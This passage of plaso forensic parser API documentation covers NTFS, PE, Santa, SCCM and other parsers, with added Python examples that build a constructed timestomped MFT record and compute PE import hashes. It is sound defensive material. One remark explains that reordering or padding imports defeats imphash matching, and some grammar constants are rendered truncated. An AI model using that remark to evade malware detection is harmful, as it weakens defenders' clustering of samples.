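    for attr_type, content in contents:
        length = (0x18 + len(content) + 7) & ~7   # attribute records are 8-byte aligned
        attributes += struct.pack("<IIBBHHHIHBB", attr_type, length, 0, 0, 0x18, 0, 0, len(content), 0x18, 0, 0)
        attributes += content + bytes(length - 0x18 - len(content))
    attributes += struct.pack("<I", ATTR_END) + bytes(4)
    record = bytearray(1024)
    record[:48] = b"FILE" + struct.pack("<HHQHHHHIIQHHI", 0x30, 3, 0, sequence, 1, 0x38, flags,
                                        0x38 + len(attributes), 1024, 0, 3, 0, record_number)
    record[0x38:0x38 + len(attributes)] = attributes
    record[0x30:0x32] = usn = b"\x01\x00"
    for index in (1, 2):  # park each sector's last two bytes in the array, overwrite them with the USN
        end = index * SECTOR_SIZE
        record[0x30 + 2 * index:0x32 + 2 * index] = record[end - 2:end]
        record[end - 2:end] = usn
    return bytes(record)

# Constructed sample: $SI reset to a round 2009 date, $FN still holds the real 2021 creation time.
FN_TIME = datetime_to_filetime(datetime(2021, 6, 6, 12, 34, 56, 789000, tzinfo=timezone.utc))
SI_TIME = datetime_to_filetime(datetime(2009, 1, 1, tzinfo=timezone.utc))
SAMPLE_RECORD = build_record(2048, 3, "cmd.exe", 5 | (5 << 48), (SI_TIME,) * 4, (FN_TIME,) * 4)
```

parse_mft_record(SAMPLE_RECORD) reports file reference 0x3000000000800 (entry 2048, sequence 3), an allocated non-directory entry named cmd.exe, and timestomp_indicators flags both the $SI-before-$FN ordering and the suspiciously round $SI times. The $SI-versus-$FN comparison needs both attributes of the same MFT entry, which is why the example keeps them in one dict; in a plaso timeline you would correlate the fs:stat:ntfs events by file_reference instead. Non-resident attributes and attribute lists are deliberately not handled here.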

class plaso.parsers.ntfs.NTFSUSNChangeEventData

  Bases: plaso.containers.events.EventData

  NTFS USN change event data.

  file_attribute_flags (int): NTFS file attribute flags.
  filename (str): name of the file associated with the event.
  file_reference (int): NTFS file reference.
  file_system_type (str): file system type.
  parent_file_reference (int): NTFS file reference of the parent.
  offset (int): offset of the USN record relative to the start of the $J data stream, from which the event data was extracted.
  update_reason_flags (int): update reason flags.
  update_sequence_number (int): update sequence number.
  update_source_flags (int): update source flags.

  DATA_TYPE = 'fs:ntfs:usn_change'

class plaso.parsers.ntfs.NTFSUsnJrnlParser

  Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

  Parses a NTFS USN change journal.

  DATA_FORMAT = 'NTFS USN change journal ($UsnJrnl:$J) file system metadata file'

  NAME = 'usnjrnl'

  ParseFileObject(parser_mediator, file_object)

    Parses a NTFS $UsnJrnl metadata file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.

plaso.parsers.olecf module

Parser for OLE Compound Files (OLECF).

class plaso.parsers.olecf.OLECFParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parses OLE Compound Files (OLECF).

  DATA_FILE = 'OLE Compound file (OLECF)'

  classmethod GetFormatSpecification()

    Retrieves the format specification.

    Returns:
      FormatSpecification: format specification.

  NAME = 'olecf'

  ParseFileObject(parser_mediator, file_object)

    Parses an OLE Compound File (OLECF) file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.

plaso.parsers.opera module

Parsers for Opera Browser history files.

class plaso.parsers.opera.OperaGlobalHistoryEventData

  Bases: plaso.containers.events.EventData

  Opera global history entry data.

  description (str): description.
  popularity_index (int): popularity index.
  title (str): title.
  url (str): URL.

  DATA_TYPE = 'opera:history:entry'

class plaso.parsers.opera.OperaGlobalHistoryParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parses the Opera global_history.dat file.

  DATA_FORMAT = 'Opera global history (global_history.dat) file'

  NAME = 'opera_global'

  ParseFileObject(parser_mediator, file_object)

    Parses an Opera global history file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.

    Raises:
      UnableToParseFile: when the file cannot be parsed.

class plaso.parsers.opera.OperaTypedHistoryEventData

  Bases: plaso.containers.events.EventData

  Opera typed history entry data.

  entry_selection (str): information about whether the URL was directly typed in or the result of the user choosing from the auto complete.
  entry_type (str): information about whether the URL was directly typed in or the result of the user choosing from the auto complete.
  url (str): typed URL or hostname.

  DATA_TYPE = 'opera:history:typed_entry'

class plaso.parsers.opera.OperaTypedHistoryParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parses the Opera typed_history.xml file.

  DATA_FORMAT = 'Opera typed history (typed_history.xml) file'

  NAME = 'opera_typed_history'

  ParseFileObject(parser_mediator, file_object)

    Parses an Opera typed history file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): file-like object.

    Raises:
      UnableToParseFile: when the file cannot be parsed.

plaso.parsers.pe module

A parser for Portable Executable format files.

class plaso.parsers.pe.PEEventData

  Bases: plaso.containers.events.EventData

  Portable Executable (PE) event data.

  dll_name (str): name of an imported DLL.
  imphash (str): "Import Hash" of the PE file the event relates to. Also see: https://www.mandiant.com/blog/tracking-malware-import-hashing
  pe_type (str): type of PE file the event relates to.
  section_names (list[str]): names of the PE file's sections.

  DATA_TYPE = 'pe'

class plaso.parsers.pe.PEParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parser for Portable Executable (PE) files.

  DATA_FORMAT = 'Portable Executable (PE) file'

  classmethod GetFormatSpecification()

    Retrieves the format specification.

  NAME = 'pe'

  ParseFileObject(parser_mediator, file_object)

    Parses a Portable Executable (PE) file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): a file-like object.

    Raises:
      UnableToParseFile: when the file cannot be parsed.
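The imphash attribute above is Mandiant's import hash: the MD5 of the import table rendered as a comma-separated, lower-cased list of library.function terms, with .dll/.ocx/.sys stripped from library names and ordinals resolved to names where a table for that library is known. The block below is an added example, not plaso or pefile code; its import lists are constructed and its ordinal table is a tiny subset of the one pefile ships, so its hashes agree with pefile's only for imports that do not hit a missing ordinal entry. It shows why the hash is useful for clustering samples (case and extension noise disappear) and why it is weak as a detection key (reordering or adding a single import changes it).

```python
"""Compute a PE import hash (imphash) from an import directory listing.

Added example, not plaso or pefile code. Scheme as Mandiant described it and
pefile implements it: for every imported symbol build "library.function",
library lower-cased with .dll/.ocx/.sys stripped, function lower-cased,
ordinals resolved through a name table or rendered as "ordN"; join the terms
with "," in import-directory order and MD5 the result. ORDINAL_NAMES is a
small subset of pefile's table; the sample import lists are constructed."""
import hashlib

ORDINAL_NAMES = {
    "ws2_32": {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 23: "socket", 52: "gethostbyname"},
    "oleaut32": {2: "SysAllocString", 6: "SysFreeString"},
}
STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")


def normalize_import(library, function=None, ordinal=None):
    """One term of the hash input: 'kernel32.createfilea', 'ws2_32.socket', 'driver.ord99'."""
    library = library.lower()
    for extension in STRIPPED_EXTENSIONS:
        if library.endswith(extension):
            library = library[:-len(extension)]
            break
    if function is None:
        if ordinal is None:
            raise ValueError("an import needs a function name or an ordinal")
        function = ORDINAL_NAMES.get(library, {}).get(ordinal, "ord%d" % ordinal)
    return "%s.%s" % (library, function.lower())


def imphash_input(imports):
    """imports: iterable of (library, function or None, ordinal or None) in the
    order the import directory lists them; the hash is order-sensitive."""
    return ",".join(normalize_import(*entry) for entry in imports)


def imphash(imports):
    return hashlib.md5(imphash_input(imports).encode("ascii")).hexdigest()


# Constructed import tables: the same four symbols written three ways.
SAMPLE_A = [("KERNEL32.dll", "CreateFileA", None), ("KERNEL32.dll", "WriteFile", None),
            ("WS2_32.dll", None, 23), ("ADVAPI32.DLL", "RegSetValueExA", None)]
SAMPLE_B = [("kernel32.DLL", "createfilea", None), ("Kernel32", "WRITEFILE", None),
            ("ws2_32", "socket", None), ("advapi32.dll", "regsetvalueexa", None)]
SAMPLE_REORDERED = list(reversed(SAMPLE_A))
```

SAMPLE_A and SAMPLE_B hash identically: the ordinal import of ws2_32!socket, the mixed case and the missing extension all normalize away. SAMPLE_REORDERED does not, which is the operational caveat: imphash groups builds of one toolchain with one import layout, and an adversary who shuffles or pads the import table breaks the match while keeping the binary's behaviour.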


plaso.parsers.plist module

Parser for binary and text Property List (plist) files.

class plaso.parsers.plist.PlistParser

  Bases: plaso.parsers.interface.FileObjectParser

  Parser for binary and text Property List (plist) files.

  DATA_FORMAT = 'Property list (plist) file'

  classmethod GetFormatSpecification()

    Retrieves the format specification.

    Returns:
      FormatSpecification: a format specification or None if not available.

  NAME = 'plist'

  ParseFileObject(parser_mediator, file_object)

    Parses a plist file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): a file-like object.

    Raises:
      UnableToParseFile: when the file cannot be parsed.

plaso.parsers.pls_recall module

Parser for PL/SQL Developer Recall files.

class plaso.parsers.pls_recall.PlsRecallEventData

  Bases: plaso.containers.events.EventData

  PL/SQL Recall event data.

  database_name (str): name of the database.
  offset (int): offset of the PL/SQL Recall record relative to the start of the file, from which the event data was extracted.
  query (str): PL/SQL query.
  sequence_number (int): sequence number.
  username (str): username used to query.

  DATA_TYPE = 'PLSRecall:event'

class plaso.parsers.pls_recall.PlsRecallParser

  Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

  Parse PL/SQL Recall files.

  This parser is based on the Delphi definition of the data type:

    TRecallRecord = packed record
      Sequence: Integer;
      TimeStamp: TDateTime;
      Username: array[0..30] of Char;
      Database: array[0..80] of Char;
      Text: array[0..4000] of Char;
    end;

  Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information.

  DATA_FORMATE = 'PL SQL cache file (PL-SQL developer recall file)'

  NAME = 'pls_recall'

  ParseFileObject(parser_mediator, file_object)

    Parses a PLSRecall.dat file-like object.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      file_object (dfvfs.FileIO): a file-like object.

    Raises:
      UnableToParseFile: when the file cannot be parsed.

plaso.parsers.plugins module

This file contains the basic interface for plugins within Plaso. This library serves as a basis for all plugins in Plaso, whether they are Windows Registry plugins, SQLite plugins or any other parsing plugins. This is provided as a separate file to make it easier to inherit in other projects that may want to use the Plaso plugin system.

class plaso.parsers.plugins.BasePlugin

  Bases: object

  A plugin is a lightweight parser that makes use of a common data structure.

  When a data structure is common among several artifacts or files a plugin infrastructure can be written to make writing parsers simpler. The goal of a parser plugin is to have only a single parser that understands the data structure, which can call plugins that have specialized knowledge of certain structures.

  An example of this is a SQLite database. A plugin can be written that has knowledge of a certain database, such as Chrome history, or Skype history, etc. This can be done without needing to write a full fledged parser that needs to re-implement the data structure knowledge. A single parser can be created that calls the plugins to see if it knows that particular database.

  Another example is the Windows Registry: there a single parser that can parse the Registry can be made and the job of a single plugin is to parse a particular Registry key. The parser can then read a Registry key and compare it to a list of available plugins to see if it can be parsed.

  DATA_FORMAT = ''

  NAME = 'base_plugin'

  Process(parser_mediator, **kwargs)

    Extracts events using a parser plugin.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfVFS.
      kwargs (dict[str, object]): depending on the plugin they may require different sets of arguments to be able to evaluate whether or not this is the correct plugin.

    Raises:
      ValueError: when there are unused keyword arguments.

  UpdateChainAndProcess(parser_mediator, **kwargs)

    Extracts events using a parser plugin and synchronizes the parser chain.

    This method updates the parser chain object held by the mediator, transfers control to the plugin-specific Process() method, and updates the chain again once the processing is complete.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfVFS.

class plaso.parsers.plugins.BasePluginCache

  Bases: object

  A generic cache for parser plugins.

  GetResults(attribute, default_value=None)

    Retrieves a cached attribute.

    Parameters:
      attribute (str): name of the cached attribute.
      default_value (Optional[object]): default value.

    Returns:
      object: value of the cached attribute or the default value if the cache does not contain the attribute.

plaso.parsers.popcontest module

This file contains the Popularity Contest log file parser in Plaso.

Information updated 20 January 2014.

From Debian Package Popularity Contest, Avery Pennarun.

From 'https://www.unix.com/man-page/Linux/8/popularity-contest':

  The popularity-contest command gathers information about Debian packages installed on the system, and prints the name of the most recently used executable program in that package as well as its last-accessed time (atime) and last-attribute-changed time (ctime) to stdout.

  When aggregated with the output of popularity-contest from many other systems, this information is valuable because it can be used to determine which Debian packages are commonly installed, used, or installed and never used. This helps Debian maintainers make decisions such as which packages should be installed by default on new systems.

  The resulting statistic is available from the project home page https://popcon.debian.org

  Normally, popularity-contest is run from a cron(8) job, /etc/cron.daily/popularity-contest, which automatically submits the results to Debian package maintainers (only once a week) according to the settings in /etc/popularity-contest.conf and /usr/share/popularity-contest/default.conf.

From 'https://popcon.ubuntu.com/README':

  The popularity-contest output looks like this:

    POPULARITY-CONTEST-0 TIME:914183330 ID:b92a5fc1809d8a95a12eb3a3c8445
    914183333 909868335 grep /bin/fgrep
    914183333 909868280 findutils /usr/bin/find
    914183330 909885698 dpkg-awk /usr/bin/dpkg-awk
    914183330 909868577 gawk /usr/bin/gawk
    [...more lines...]
    END-POPULARITY-CONTEST-0 TIME:914183335

  The first and last lines allow you to put more than one set of popularity-contest results into a single file and then split them up easily later.

  The rest of the lines are package entries, one line for each package installed on your system. They have the format:

    <atime> <ctime> <package> <mru> <tag>

  <package> is the name of the Debian package that contains <mru>. <mru> is the most recently used program, static library, or header (.h) file in the package.

  <atime> and <ctime> are the access time and creation time of the <mru> on your disk, respectively, represented as the number of seconds since midnight GMT on January 1, 1970 (i.e. in Unix time_t format). Linux updates <atime> whenever you open the file; <ctime> was set when you first installed the package.

  <tag> is determined by popularity-contest depending on <atime>, <ctime>, and the current date. <tag> can be RECENT-CTIME, OLD, or NOFILES.

  RECENT-CTIME means that atime is very close to ctime; it's impossible to tell whether the package was used recently or not, since <atime> is also updated when <ctime> is set. Normally, this happens because you have recently upgraded the package to a new version, resetting the <ctime>.

  OLD means that the <atime> is more than a month ago; you haven't used the package for more than a month.

  NOFILES means that no files in the package seemed to be programs, so <atime>, <ctime>, and <mru> are invalid.'

REMARKS. The parser will generate events solely based on the <atime> field and not using <ctime>, to reduce the generation of (possibly many) useless events all with the same <ctime>. Indeed, that information will probably be obtained from file system and/or package management logs. The <ctime> will be reported in the log line.

class plaso.parsers.popcontest.PopularityContestEventData

  Bases: plaso.containers.events.EventData

  Popularity Contest event data.

  mru (str): recently used app/library from package.
  package (str): installed package name, which the mru belongs to.
  record_tag (str): popularity contest tag.

  DATA_TYPE = 'popularity_contest:log:event'

class plaso.parsers.popcontest.PopularityContestParser

  Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

  Parse popularity contest log files.

  DATA_FORMAT = 'Popularity Contest log file'

  FOOTER = {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)}

  HEADER = {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}

  LINE_STRUCTURES = [('logline', {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}), ('header', {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}), ('footer', {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)})]

  LOG_LINE = {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}

  MRU = W:(...)

  NAME = 'popularity_contest'

  PACKAGE = W:(0123...)

  ParseRecord(parser_mediator, key, structure)

    Parses a log record structure and produces events.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      key (str): name of the parsed structure.
      structure (pyparsing.ParseResults): structure parsed from the log file.

    Raises:
      ParseError: when the structure type is unknown.

  TAG = quoted string, starting with < ending with >

  VerifyStructure(parser_mediator, line)

    Verify that this file is a Popularity Contest log file.

    Parameters:
      parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs.
      line (str): line from a text file.

    Returns:
      bool: True if the line was successfully parsed.

class plaso.parsers.popcontest.PopularityContestSessionEventData

  Bases: plaso.containers.events.EventData

  Popularity Contest session event data.

  details (str): version and host architecture.
  hostid (str): host uuid.
  session (int): session number.
  status (str): session status, either "start" or "end".

  DATA_TYPE = 'popularity_contest:session:event'

plaso.parsers.presets module

The parser and parser plugin presets.

class plaso.parsers.presets.ParserPreset(name, parsers)
    Bases: object

    Parser and parser plugin preset.

    name
        name of the preset.

        Type: str

    operating_systems
        operating system artifact attribute containers, that specify to which operating systems the preset applies.

        Type: list[OperatingSystemArtifact]

    parsers
        names of parser and parser plugins.

        Type: list[str]

class plaso.parsers.presets.ParserPresetsManager
    Bases: object

    The parsers and plugin presets manager.

    GetNames()
        Retrieves the preset names.

        Returns: preset names in alphabetical order.

        Return type: list[str]

    GetParsersByPreset(preset_name)
        Retrieves the parser and plugin names of a specific preset.

        Parameters: preset_name (str) – name of the preset.

        Returns: parser and plugin names in alphabetical order.

        Return type: list[str]

        Raises: KeyError – if the preset does not exist.

    GetPresetByName(name)
        Retrieves a specific preset definition by name.

        Parameters: name (str) – name of the preset.

        Returns: a parser preset or None if not available.

        Return type: ParserPreset

    GetPresetsByOperatingSystem(operating_system)
        Retrieves preset definitions for a specific operating system.

        Parameters: operating_system (OperatingSystemArtifact) – an operating system artifact attribute container.

        Returns: preset definitions that correspond with the operating system.

        Return type: list[PresetDefinition]

    GetPresetsInformation()
        Retrieves the presets information.

        Returns: tuples containing: str: preset name. str: comma separated parser and plugin names that are defined by the preset.

        Return type: list[tuple]

    ReadFromFile(path)
        Reads parser and parser plugin presets from a file.

        Parameters: path (str) – path of the file that contains the parser and parser plugin presets configuration.

        Raises: MalformedPresetError – if one or more plugin preset definitions are malformed.

plaso.parsers.recycler module

Parser for Windows Recycle files, INFO2 and $I/$R pairs.

class plaso.parsers.recycler.WinRecycleBinEventData
    Bases: plaso.containers.events.EventData

    Windows Recycle Bin event data.

    drive_number
        drive number.

        Type: int

    file_size
        file size.

        Type: int

    offset
        offset of the Recycle Bin record relative to the start of the file, from which the event data was extracted.

        Type: int

    original_filename
        filename.

        Type: str

    record_index
        index of the record, from which the event data was extracted.

        Type: int

    short_filename
        short filename.

        Type: str

    DATA_TYPE = 'windows:metadata:deleted_item'

class plaso.parsers.recycler.WinRecycleBinParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parses the Windows $Recycle.Bin $I files.

    DATA_FORMAT = 'Windows $Recycle.Bin $I file'

    NAME = 'recycle_bin'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Recycle.Bin metadata ($I) file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.

        Raises: UnableToParseFile – when the file cannot be parsed.

class plaso.parsers.recycler.WinRecyclerInfo2Parser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parses the Windows Recycler INFO2 file.

    DATA_FORMAT = 'Windows Recycler INFO2 file'

    NAME = 'recycle_bin_info2'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows Recycler INFO2 file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.

        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.safari_cookies module

Parser for Safari Binary Cookie files.

class plaso.parsers.safari_cookies.BinaryCookieParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Safari Binary Cookie files.

    DATA_FORMAT = 'Safari Binary Cookie file'

    classmethod GetFormatSpecification()
        Retrieves the format specification for parser selection.

        Returns: format specification.

        Return type: FormatSpecification

    NAME = 'binary_cookies'

    ParseFileObject(parser_mediator, file_object)
        Parses a Safari binary cookie file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – parser mediator.
            • file_object (dfvfs.FileIO) – file-like object to be parsed.

        Raises:
            • ParseError – when the page sizes array cannot be parsed.
            • UnableToParseFile – when the file cannot be parsed, this will signal the event extractor to apply other parsers.

class plaso.parsers.safari_cookies.SafariBinaryCookieEventData
    Bases: plaso.containers.events.EventData

    Safari binary cookie event data.

    cookie_name
        cookie name.

        Type: str

    cookie_value
        cookie value.

        Type: str

    flags
        cookie flags.

        Type: int

    path
        path of the cookie.

        Type: str

    url
        URL where this cookie is valid.

        Type: str

    DATA_TYPE = 'safari:cookie:entry'

plaso.parsers.santa module

Santa log (santa.log) parser.

class plaso.parsers.santa.SantaExecutionEventData
    Bases: plaso.containers.events.EventData

    Santa execution event data.

    action
        action recorded by Santa.

        Type: str

    decision
        if the process was allowed or blocked.

        Type: str

    reason
        reason behind Santa's decision to execute or block a process.

        Type: str

    process_hash
        SHA256 hash for the executed process.

        Type: str

    certificate_hash
        SHA256 hash for the certificate associated with the executed process.

        Type: str

    certificate_common_name
        certificate common name.

        Type: str

    pid
        process id for the process.

        Type: str

    ppid
        parent process id for the executed process.

        Type: str

    uid
        user id associated with the executed process.

        Type: str

    user
        user name associated with the executed process.

        Type: str

    gid
        group id associated with the executed process.

        Type: str

    group
        group name associated with the executed process.

        Type: str

    mode
        Santa execution mode, for example Monitor or Lockdown.

        Type: str

    process_path
        process file path.

        Type: str

    process_arguments
        executed process with its arguments.

        Type: str

    DATA_TYPE = 'santa:execution'

class plaso.parsers.santa.SantaFileSystemEventData
    Bases: plaso.containers.events.EventData

    Santa file system event data.

    action
        event type recorded by Santa.

        Type: str

    file_path
        file path and name for WRITE/DELETE events.

        Type: str

    file_new_path
        new file path and name for RENAME events.

        Type: str

    pid
        process id for the process.

        Type: str

    ppid
        parent process id for the executed process.

        Type: str

    process
        process name.

        Type: str

    process_path
        process file path.

        Type: str

    uid
        user id associated with the executed process.

        Type: str

    user
        user name associated with the executed process.

        Type: str

    gid
        group id associated with the executed process.

        Type: str

    group
        group name associated with the executed process.

        Type: str

    DATA_TYPE = 'santa:file_system_event'

class plaso.parsers.santa.SantaMountEventData
    Bases: plaso.containers.events.EventData

    Santa mount event data.

    action
        event type recorded by Santa.

        Type: str

    mount
        disk mount point.

        Type: str

    volume
        disk volume name.

        Type: str

    bsd_name
        disk BSD name.

        Type: str

    fs
        disk volume kind.

        Type: str

    model
        disk model.

        Type: str

    serial
        disk serial.

        Type: str

    bus
        device protocol.

        Type: str

    dmg_path
        DMG file path.

        Type: str

    appearance
        disk appearance date.

        Type: str

    DATA_TYPE = 'santa:diskmount'

class plaso.parsers.santa.SantaParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses Santa log files.

    DATA_FORMAT = 'Santa log (santa.log) file'

    LINE_STRUCTURES = [('execution_line', {{{{{{{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "EXEC"} Suppress:("|")} {{Suppress:("decision=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("reason=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("sha256=") SkipTo:("|")} Suppress:("|")}} [{{Suppress:("cert_sha256=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("cert_cn=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("quarantine_url=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("mode=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{Suppress:("args=") SkipTo:(lineEnd)}]}), ('file_system_event_line', {{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} {{"WRITE" ^ "RENAME"} ^ "DELETE"}} Suppress:("|")} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{{Suppress:("newpath=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("process=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("processpath=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('mount_line', {{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("fs=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("model=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("serial=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bus=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("dmgpath=") SkipTo:("|")} Suppress:("|")}} {Suppress:("appearance=") SkipTo:(lineEnd)}}), ('umount_line', {{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKDISAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('quota_exceeded_line', {Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) "*** LOG MESSAGE QUOTA EXCEEDED - SOME MESSAGES FROM THIS PROCESS HAVE BEEN DISCARDED ***"})]

    MAX_LINE_LENGTH = 16384

    NAME = 'santa'

    ParseRecord(parser_mediator, key, structure)
        Parses a matching entry.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – elements parsed from the file.

        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verifies that this is a Santa log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from the text file.

        Returns: True if this is the correct parser, False otherwise.

        Return type: bool

plaso.parsers.sccm module

Parser for SCCM Logs.

class plaso.parsers.sccm.SCCMLogEventData
    Bases: plaso.containers.events.EventData

    SCCM log event data.

    component
        component.

        Type: str

    text
        text.

        Type: str

    DATA_TYPE = 'software_management:sccm:log'

class plaso.parsers.sccm.SCCMParser
    Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

    Parser for Windows System Center Configuration Manager (SCCM) logs.

    BUFFER_SIZE = 16384

    DATA_FORMAT = 'System Center Configuration Manager (SCCM) client log file'

    LINE_GRAMMAR_BASE = {{{{{{{{{{{{{{{{{"


LINE_GRAMMAR_OFFSET = {{{{{{{{{{{{{{{{{{"

plaso.parsers.selinux module

This file contains the SELinux audit log (audit.log) file parser. Information updated 16 January 2013.

An example:

    type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm="httpd" path="/home/auser/public_html" dev=sdb2 ino=921135

Where msg=audit(1105758604.519:420) contains the number of seconds since January 1, 1970 00:00:00 UTC and the number of milliseconds after the dot, for example: "seconds: 1105758604, milliseconds: 519". The number after the timestamp (420 in the example) is a 'serial number' that can be used to correlate multiple logs generated from the same event.

class plaso.parsers.selinux.SELinuxLogEventData
    Bases: plaso.containers.events.EventData

    SELinux log event data.

    audit_type
        audit type.

        Type: str

    body
        body of the log line.

